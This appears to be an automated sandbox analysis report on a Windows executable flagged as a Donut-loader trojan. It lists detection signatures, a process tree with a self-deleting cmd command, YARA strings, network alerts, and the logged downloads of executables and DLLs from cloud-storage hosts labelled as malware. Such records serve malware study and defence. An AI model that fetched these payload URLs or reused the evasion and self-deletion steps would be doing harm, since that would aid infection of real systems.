Windows Analysis Report
LisectAVT_2403002B_185.exe

Overview

General Information

Sample name:LisectAVT_2403002B_185.exe
Analysis ID:1482004
MD5:0aafd40537a281b281bd85efcb2c976b
SHA1:d9b7aa59133586c9f885899b0483117500460036
SHA256:89daf7a9b800a5d38cf93accc70b5f24568aa65353e2c1b44199159a8cf888fb
Tags:exe
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Reads the Security eventlog
Reads the System eventlog
Self deletion via cmd or bat file
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • LisectAVT_2403002B_185.exe (PID: 5780 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_185.exe" MD5: 0AAFD40537A281B281BD85EFCB2C976B)
    • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5456 cmdline: "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source: sslproxydump.pcap
Rule: Windows_Trojan_Donutloader_f40e3759
Description: unknown
Author: unknown
Strings:
  • 0x241304:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x244af6:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Source: C:\Program Files (x86)\Everything\4.bin
Rule: Windows_Trojan_Donutloader_f40e3759
Description: unknown
Author: unknown
Strings:
  • 0x3f08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x743e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\qd[1].bin
Rule: Windows_Trojan_Donutloader_f40e3759
Description: unknown
Author: unknown
Strings:
  • 0x3f08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x743e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Source: 00000000.00000003.2552378256.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
Rule: Windows_Trojan_Donutloader_f40e3759
Description: unknown
Author: unknown
Strings:
  • 0x3e08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x733e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Source: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Donutloader_f40e3759
Description: unknown
Author: unknown
Strings:
  • 0x3f08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x743e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

System Summary

Source: File created, Author: Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe, ProcessId: 5780, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mss2rbn.cnk.ps1
No Snort rule has matched
Timestamp:2024-07-25T17:09:35.079831+0200
SID:2011803
Source Port:443
Destination Port:49715
Protocol:TCP
Classtype:Executable code was detected
Timestamp:2024-07-25T17:09:27.110663+0200
SID:2018581
Source Port:49714
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T17:10:08.423363+0200
SID:2022930
Source Port:443
Destination Port:61610
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T17:09:39.774044+0200
SID:2022930
Source Port:443
Destination Port:49716
Protocol:TCP
Classtype:A Network Trojan was detected

AV Detection

Source: LisectAVT_2403002B_185.exe, Avira: detected
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/, Avira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllU, Avira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/Tiw, Avira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll, Avira URL Cloud: Label: malware
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.3% probability
Source: LisectAVT_2403002B_185.exe, Joe Sandbox ML: detected
Source: LisectAVT_2403002B_185.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 82.156.94.48:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 82.156.94.47:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 43.153.232.152:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: LisectAVT_2403002B_185.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: G:\Jenkins_MusicBoxWorkPrjCode\MusicBox_PUBLIC_RELESE_20-10-09_9.1.1.3\code\KwResource\bin\Release\pdb\KwTools.pdb source: LisectAVT_2403002B_185.exe
Source: Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe, Code function: 0_2_005FEBE2 FindFirstFileExW,0_2_005FEBE2
Source: Joe Sandbox View, IP Address: 43.153.232.152 43.153.232.152
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic, HTTP traffic detected: GET /1.exe HTTP/1.1; User-Agent: Mozilla/5.0; Host: kdll-1323571269.cos.ap-beijing.myqcloud.com; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /msvcr120.dll HTTP/1.1; User-Agent: Mozilla/5.0; Host: kdll-1323571269.cos.ap-beijing.myqcloud.com; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1; User-Agent: Mozilla/5.0; Host: kdll-1323571269.cos.ap-beijing.myqcloud.com; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /msvcp140.dll HTTP/1.1; User-Agent: Mozilla/5.0; Host: kdll-1323571269.cos.ap-beijing.myqcloud.com; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /msvcp120.dll HTTP/1.1; User-Agent: Mozilla/5.0; Host: kdll-1323571269.cos.ap-beijing.myqcloud.com; Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /zf_cef.dll HTTP/1.1; User-Agent: Mozilla/5.0; Host: leisuretrade-1323571269.cos.ap-beijing.myqcloud.com; Cache-Control: no-cache
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe, Code function: 0_2_005E3240 Sleep,InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,fpos,fpos,fpos,VirtualAlloc,fpos,VirtualFree,0_2_005E3240
Source: global traffic, HTTP traffic detected: GET /qd.bin HTTP/1.1; User-Agent: loader; Host: wwwqd-1323571269.cos.ap-singapore.myqcloud.com; Cache-Control: no-cache
Source: global traffic, DNS traffic detected: DNS query: kdll-1323571269.cos.ap-beijing.myqcloud.com
Source: global traffic, DNS traffic detected: DNS query: leisuretrade-1323571269.cos.ap-beijing.myqcloud.com
Source: global traffic, DNS traffic detected: DNS query: wwwqd-1323571269.cos.ap-singapore.myqcloud.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: application/xml; Content-Length: 423; Connection: close; Date: Thu, 25 Jul 2024 15:09:26 GMT; Server: tencent-cos; x-cos-request-id: NjZhMjZhYTZfOWFhYzViNjRfMjJkM18yMDBmNGZj
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 82.156.94.48:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 82.156.94.47:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.153.232.152:443 -> 192.168.2.5:49723 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior

System Summary

Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000003.2552378256.0000000000D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Program Files (x86)\Everything\4.bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\qd[1].bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_05C9E9B80_3_05C9E9B8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C42C00_3_036C42C0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C645C0_3_036C645C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C8C540_3_036C8C54
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C519C0_3_036C519C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C55780_3_036C5578
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C59A80_3_036C59A8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005F20A00_2_005F20A0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005FD1D90_2_005FD1D9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_006013AD0_2_006013AD
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_006036840_2_00603684
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005FC9DD0_2_005FC9DD
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005EFE5A0_2_005EFE5A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: String function: 005EA740 appears 54 times
Source: LisectAVT_2403002B_185.exeStatic PE information: invalid certificate
Source: LisectAVT_2403002B_185.exeStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003998000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2625258364.0000000005AC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003941000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2628033628.0000000006DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000003.2552378256.0000000000D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Program Files (x86)\Everything\4.bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\qd[1].bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engineClassification label: mal88.evad.winEXE@5/19@3/3
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\EverythingJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcr120[1].dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_03
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mss2rbn.cnk.ps1Jump to behavior
Source: LisectAVT_2403002B_185.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe "C:\Users\user\Desktop\LisectAVT_2403002B_185.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exeJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: msisip.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wshext.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: miutils.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: LisectAVT_2403002B_185.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: G:\Jenkins_MusicBoxWorkPrjCode\MusicBox_PUBLIC_RELESE_20-10-09_9.1.1.3\code\KwResource\bin\Release\pdb\KwTools.pdb source: LisectAVT_2403002B_185.exe
Source: Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: msvcp140[1].dll.0.drStatic PE information: 0x771734A7 [Mon Apr 25 02:38:31 2033 UTC]
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_05C9A680 pushad ; ret 0_3_05C9A693
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C0439 push ebx; ret 0_3_036C0447
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C1A79 pushad ; ret 0_3_036C1A83
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C1A3C push ds; ret 0_3_036C1A67
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C3A04 push FFFFFFBEh; iretd 0_3_036C3A06
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C1AEF push esi; ret 0_3_036C1AF8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_036C185F push es; iretd 0_3_036C1868
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005EA264 push ecx; ret 0_2_005EA277
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0379104D push esp; ret 0_2_03791071
